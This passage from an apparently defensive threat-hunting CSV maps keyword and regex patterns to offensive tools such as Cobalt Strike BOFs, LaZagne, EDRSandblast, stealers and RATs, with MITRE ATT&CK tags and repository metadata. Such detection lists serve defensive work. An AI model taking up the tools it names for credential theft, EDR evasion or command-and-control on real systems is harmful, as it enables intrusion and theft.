Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*agoakfejjabomempkjlepdflaleeobhb*",".{0,1000}agoakfejjabomempkjlepdflaleeobhb.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*AgUAAAAAAAAAAAAOZG5zLmdvb2dsZS5jb20NL2V4cGVyaW1lbnRhbA*",".{0,1000}AgUAAAAAAAAAAAAOZG5zLmdvb2dsZS5jb20NL2V4cGVyaW1lbnRhbA.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*ahmedkhlief/Ninja*",".{0,1000}ahmedkhlief\/Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ahmedkhlief/Ninja*",".{0,1000}ahmedkhlief\/Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*AhMyth-Android-RAT*",".{0,1000}AhMyth\-Android\-RAT.{0,1000}","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth 
Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","10","4223","1660","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z" "*aholpfdialjgjfhomihkjbmgjidlcdno*",".{0,1000}aholpfdialjgjfhomihkjbmgjidlcdno.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ahsten.run \*powershell.exe*",".{0,1000}ahsten\.run\s\\.{0,1000}powershell\.exe.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*aiifbnbfobpmeekipheeijimdpnlpgpp*",".{0,1000}aiifbnbfobpmeekipheeijimdpnlpgpp.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*aiocmd\nested_completer.py*",".{0,1000}aiocmd\\nested_completer\.py.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Airbash*",".{0,1000}Airbash.{0,1000}","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/tehw0lf/airbash","1","0","N/A","N/A","4","344","65","2021-10-26T09:47:34Z","2018-04-18T23:50:15Z" "*Aircrack-ng*",".{0,1000}Aircrack\-ng.{0,1000}","offensive_tool_keyword","aircrack-ng","WiFi security auditing tools suite.","T1110 - T1170 - T1180 - T1201 - T1213","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","10","4813","871","2024-05-01T12:54:30Z","2018-03-10T17:11:11Z" "*aircrack-ng*",".{0,1000}aircrack\-ng.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*aireplay-ng *",".{0,1000}aireplay\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*aireplay-ng *",".{0,1000}aireplay\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Airgeddon*",".{0,1000}Airgeddon.{0,1000}","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1590 - T1533 - T1170 - T1583.001","TA0002 - TA0003 - ","N/A","N/A","Network Exploitation tools","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","N/A","N/A","10","6029","1136","2024-04-12T05:12:20Z","2016-03-18T10:34:56Z" "*airman604/splunk_whisperer*",".{0,1000}airman604\/splunk_whisperer.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*airmon-ng*",".{0,1000}airmon\-ng.{0,1000}","offensive_tool_keyword","airmon-ng","This script can be used to enable monitor mode on wireless interfaces. 
It may also be used to kill network managers or go back from monitor mode to managed mode","T1018 - T1040","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.aircrack-ng.org/doku.php?id=airmon-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*airodump-ng *",".{0,1000}airodump\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*airpwn-ng*",".{0,1000}airpwn\-ng.{0,1000}","offensive_tool_keyword","airpwn-ng","We force the targets browser to do what we want","T1562 - T1564 - T1565 - T1566 - T1567 - T1573","TA0005 - TA0007 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/ICSec/airpwn-ng","1","1","N/A","N/A","1","32","12","2022-11-07T02:22:34Z","2021-07-20T03:43:13Z" "*aix2john.pl*",".{0,1000}aix2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*aix2john.py*",".{0,1000}aix2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ajpc500/BOFs*",".{0,1000}ajpc500\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*akamai/DDSpoof*",".{0,1000}akamai\/DDSpoof.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*akuafif/hXOR-Packer*",".{0,1000}akuafif\/hXOR\-Packer.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*AlanFramework.git*",".{0,1000}AlanFramework\.git.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - 
T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*Alcatraz.sln*",".{0,1000}Alcatraz\.sln.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*Alcatraz.vcxproj*",".{0,1000}Alcatraz\.vcxproj.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*Alcatraz/obfuscator*",".{0,1000}Alcatraz\/obfuscator.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*Alcatraz-master.zip*",".{0,1000}Alcatraz\-master\.zip.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*AlessandroZ/BeRoot*",".{0,1000}AlessandroZ\/BeRoot.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*AlessandroZ/LaZagne*",".{0,1000}AlessandroZ\/LaZagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to 
retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*alexa-top-20000-sites.txt*",".{0,1000}alexa\-top\-20000\-sites\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*alex-sector/dns2tcp*",".{0,1000}alex\-sector\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*al-khaser*",".{0,1000}al\-khaser.{0,1000}","offensive_tool_keyword","al-khaser","al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. 
It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar","T1055 - T1117 - T1218 - T1003 - T1552","TA0002 - TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy/al-khaser","1","0","N/A","N/A","10","5532","1133","2024-03-18T21:51:23Z","2015-11-12T18:35:16Z" "*---All Azure AD User Principal Names---*",".{0,1000}\-\-\-All\sAzure\sAD\sUser\sPrincipal\sNames\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*All Done! Hack the planet!*",".{0,1000}All\sDone!\sHack\sthe\splanet!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*All EDR drivers were successfully removed from Kernel callbacks!*",".{0,1000}All\sEDR\sdrivers\swere\ssuccessfully\sremoved\sfrom\sKernel\scallbacks!.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*All good in the hood. 
Check Temp for test.txt*",".{0,1000}All\sgood\sin\sthe\shood\.\sCheck\sTemp\sfor\stest\.txt.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*All_SubdomainTOP_Seclist.txt*",".{0,1000}All_SubdomainTOP_Seclist\.txt.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*Allocated shellcode memory in the target process: *",".{0,1000}Allocated\sshellcode\smemory\sin\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*Allocated shellcode memory in the target process: *",".{0,1000}Allocated\sshellcode\smemory\sin\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*Allow Multiple RDP (Remote Desktop) Sessions By Patching termsrv.dll File*",".{0,1000}Allow\sMultiple\sRDP\s\(Remote\sDesktop\)\sSessions\sBy\sPatching\stermsrv\.dll\sFile.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed 
multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*AllowDelegationUsers.txt*",".{0,1000}AllowDelegationUsers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*AllowDelegationUsers_samaccountnames_only.txt*",".{0,1000}AllowDelegationUsers_samaccountnames_only\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*almandin/krbjack*",".{0,1000}almandin\/krbjack.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*AlmondOffSec/PassTheCert*",".{0,1000}AlmondOffSec\/PassTheCert.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" 
"*ALPC-TaskSched-LPE*",".{0,1000}ALPC\-TaskSched\-LPE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ALPC-TaskSched-LPE.*",".{0,1000}ALPC\-TaskSched\-LPE\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Alphabug_CS*",".{0,1000}Alphabug_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*Alphabug_CS*",".{0,1000}Alphabug_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate 
passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*AlphabugX/csOnvps*",".{0,1000}AlphabugX\/csOnvps.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*AlphabugX/csOnvps*",".{0,1000}AlphabugX\/csOnvps.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*Already in high integrity, no need to privesc!*",".{0,1000}Already\sin\shigh\sintegrity,\sno\sneed\sto\sprivesc!.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
